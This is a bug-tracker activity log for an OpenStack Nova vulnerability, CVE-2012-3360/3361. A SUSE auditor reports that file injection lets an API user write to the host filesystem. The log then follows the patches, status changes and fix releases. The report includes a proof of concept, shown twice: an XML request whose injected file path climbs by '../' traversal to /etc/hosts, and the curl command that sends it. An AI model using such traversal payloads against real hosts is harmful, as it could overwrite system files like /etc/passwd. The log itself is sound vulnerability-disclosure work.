2012-06-20 12:02:31 |
Thierry Carrez |
bug |
|
|
added bug |
2012-06-20 12:03:32 |
Thierry Carrez |
description |
Mathias Weckbecker from SUSE Security Team reported the following:
------------------
During our internal security audit efforts at SUSE for openstack, I have found
an issue in openstack-nova (compute).
Quoting from [1] (comment #1):
Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
[... snipped copy of utils.execute code ...]
It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.
Testcase (also from [1], comment #0):
mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
flavorRef="6"
name="new-server-test">
<metadata>
<meta key="My Server Name">foobar</meta>
</metadata>
<personality>
<file path="../../../../../../../../../../../../../etc/hosts">
ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
</file>
</personality>
</server>
mweckbecker@s3gfault:~$ curl -v
"http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers"
-H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15"
-H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml
Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.
[1] https://bugzilla.novell.com/show_bug.cgi?id=767687
Thanks, Matthias |
Matthias Weckbecker from SUSE Security Team reported the following:
------------------
During our internal security audit efforts at SUSE for openstack, I have found
an issue in openstack-nova (compute).
Quoting from [1] (comment #1):
Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
[... snipped copy of utils.execute code ...]
It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.
Testcase (also from [1], comment #0):
mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
flavorRef="6"
name="new-server-test">
<metadata>
<meta key="My Server Name">foobar</meta>
</metadata>
<personality>
<file path="../../../../../../../../../../../../../etc/hosts">
ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
</file>
</personality>
</server>
mweckbecker@s3gfault:~$ curl -v
"http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers"
-H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15"
-H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml
Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.
[1] https://bugzilla.novell.com/show_bug.cgi?id=767687
Thanks, Matthias |
|
2012-06-20 12:03:47 |
Thierry Carrez |
bug |
|
|
added subscriber Matthias Weckbecker |
2012-06-20 12:08:10 |
Thierry Carrez |
nova: importance |
Undecided |
Critical |
|
2012-06-20 12:08:10 |
Thierry Carrez |
nova: status |
New |
Confirmed |
|
2012-06-20 12:14:30 |
Thierry Carrez |
bug |
|
|
added subscriber Vish Ishaya |
2012-06-20 15:41:24 |
Russell Bryant |
nova: assignee |
|
Russell Bryant (russellb) |
|
2012-06-20 15:58:37 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197658/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-20 15:58:50 |
Russell Bryant |
bug |
|
|
added subscriber Pádraig Brady |
2012-06-20 16:01:31 |
Russell Bryant |
attachment removed |
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197658/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
|
2012-06-20 16:01:53 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197661/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-20 16:11:20 |
Russell Bryant |
attachment removed |
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197661/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
|
2012-06-20 16:12:24 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197663/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-20 16:29:43 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem-essex.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197686/+files/0001-Prevent-file-injection-writing-to-host-filesystem-essex.patch |
|
2012-06-20 16:29:52 |
Russell Bryant |
nominated for series |
|
nova/essex |
|
2012-06-20 19:30:08 |
Russell Bryant |
bug |
|
|
added subscriber Mark McLoughlin |
2012-06-21 07:03:17 |
Mark McLoughlin |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3198461/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-21 07:03:32 |
Mark McLoughlin |
bug task added |
|
nova/essex |
|
2012-06-21 08:09:05 |
Matthias Weckbecker |
bug |
|
|
added subscriber Thomas Biege |
2012-06-21 08:20:55 |
Thomas Biege |
bug |
|
|
added subscriber Christoph Thiel |
2012-06-21 09:04:44 |
Matthias Weckbecker |
bug |
|
|
added subscriber Ionuț Arțăriși |
2012-06-21 14:01:42 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3198817/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-21 14:01:58 |
Russell Bryant |
nova: assignee |
Russell Bryant (russellb) |
|
|
2012-06-21 14:02:03 |
Russell Bryant |
nova/essex: importance |
Undecided |
Critical |
|
2012-06-21 14:03:18 |
Russell Bryant |
nova/essex: status |
New |
Confirmed |
|
2012-06-21 14:03:38 |
Russell Bryant |
nominated for series |
|
nova/diablo |
|
2012-06-21 14:30:27 |
Thierry Carrez |
bug task added |
|
nova/diablo |
|
2012-06-21 14:30:35 |
Thierry Carrez |
nova/diablo: status |
New |
Confirmed |
|
2012-06-21 14:30:38 |
Thierry Carrez |
nova/diablo: importance |
Undecided |
High |
|
2012-06-25 09:42:43 |
Matthias Weckbecker |
bug |
|
|
added subscriber Sebastian Krahmer |
2012-06-25 10:09:13 |
Thierry Carrez |
attachment added |
|
Essex patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3203400/+files/essex.patch |
|
2012-06-25 11:57:39 |
Thierry Carrez |
attachment added |
|
Diablo patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3203516/+files/diablo.patch |
|
2012-06-25 12:48:29 |
Thierry Carrez |
attachment added |
|
diablo2.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3203587/+files/diablo2.patch |
|
2012-06-26 15:44:49 |
Thierry Carrez |
nova: assignee |
|
Thierry Carrez (ttx) |
|
2012-06-27 07:43:54 |
Thierry Carrez |
cve linked |
|
2012-3360 |
|
2012-06-27 07:44:11 |
Thierry Carrez |
cve linked |
|
2012-3361 |
|
2012-06-28 10:07:52 |
Thierry Carrez |
nova: status |
Confirmed |
Triaged |
|
2012-06-28 10:07:55 |
Thierry Carrez |
nova/diablo: status |
Confirmed |
Triaged |
|
2012-06-28 10:07:57 |
Thierry Carrez |
nova/essex: status |
Confirmed |
Triaged |
|
2012-07-03 10:16:42 |
Thierry Carrez |
bug |
|
|
added subscriber Dave Walker |
2012-07-03 16:05:59 |
Thierry Carrez |
visibility |
private |
public |
|
2012-07-03 16:06:05 |
Thierry Carrez |
nova: status |
Triaged |
Fix Committed |
|
2012-07-03 16:06:09 |
Thierry Carrez |
nova/diablo: status |
Triaged |
Fix Committed |
|
2012-07-03 16:06:14 |
Thierry Carrez |
nova/essex: status |
Triaged |
In Progress |
|
2012-07-03 16:06:19 |
Thierry Carrez |
nova/diablo: assignee |
|
Thierry Carrez (ttx) |
|
2012-07-03 16:06:22 |
Thierry Carrez |
nova/essex: assignee |
|
Thierry Carrez (ttx) |
|
2012-07-03 17:30:25 |
Steve Beattie |
bug |
|
|
added subscriber Steve Beattie |
2012-07-04 08:26:12 |
Thierry Carrez |
nova: status |
Fix Committed |
Fix Released |
|
2012-07-04 08:26:12 |
Thierry Carrez |
nova: milestone |
|
folsom-2 |
|
2012-07-05 09:51:55 |
Thierry Carrez |
removed subscriber OpenStack Vulnerability Management team |
|
|
|
2012-08-07 16:54:58 |
OpenStack Infra |
nova: status |
Fix Released |
In Progress |
|
2012-08-07 16:54:58 |
OpenStack Infra |
nova: assignee |
Thierry Carrez (ttx) |
Pádraig Brady (p-draigbrady) |
|
2012-08-07 17:04:49 |
OpenStack Infra |
nova/essex: assignee |
Thierry Carrez (ttx) |
Pádraig Brady (p-draigbrady) |
|
2012-08-07 18:53:22 |
Thierry Carrez |
nova: status |
In Progress |
Fix Released |
|
2012-08-07 18:53:41 |
Thierry Carrez |
nova/essex: status |
In Progress |
Fix Committed |
|
2012-08-07 22:56:21 |
Mark McLoughlin |
nova/essex: milestone |
|
2012.1.2 |
|
2012-08-10 06:03:27 |
Mark McLoughlin |
nova/essex: status |
Fix Committed |
Fix Released |
|
2012-08-24 09:22:19 |
Dave Walker |
nova (Ubuntu): status |
New |
Fix Released |
|
2012-08-24 09:22:22 |
Dave Walker |
nominated for series |
|
Ubuntu Precise |
|
2012-08-24 09:22:22 |
Dave Walker |
bug task added |
|
nova (Ubuntu Precise) |
|
2012-08-24 09:22:25 |
Dave Walker |
nova (Ubuntu Precise): status |
New |
Confirmed |
|
2012-08-24 09:51:36 |
Launchpad Janitor |
branch linked |
|
lp:~openstack-ubuntu-testing/nova/precise-essex-proposed |
|
2012-08-24 19:04:10 |
Jamie Strandboge |
cve linked |
|
2012-3447 |
|
2012-08-24 19:45:23 |
Launchpad Janitor |
branch linked |
|
lp:ubuntu/precise-proposed/nova |
|
2012-08-30 07:45:06 |
Adam Gandelman |
attachment added |
|
2012.1.3+stable-20120827-4d2a4afe-0ubuntu1.log https://bugs.launchpad.net/bugs/1015531/+attachment/3283238/+files/2012.1.3%2Bstable-20120827-4d2a4afe-0ubuntu1.log |
|
2012-08-30 07:45:08 |
Adam Gandelman |
tags |
|
verification-done |
|
2012-09-03 15:18:08 |
Launchpad Janitor |
nova (Ubuntu Precise): status |
Confirmed |
Fix Released |
|
2012-09-03 15:18:08 |
Launchpad Janitor |
cve linked |
|
2012-3371 |
|
2012-09-27 15:21:59 |
Thierry Carrez |
nova: milestone |
folsom-2 |
2012.2 |
|
2013-09-13 14:06:40 |
Thierry Carrez |
nova/diablo: assignee |
Thierry Carrez (ttx) |
|
|
2014-09-15 15:40:07 |
Sean Dague |
bug task deleted |
nova/diablo |
|
|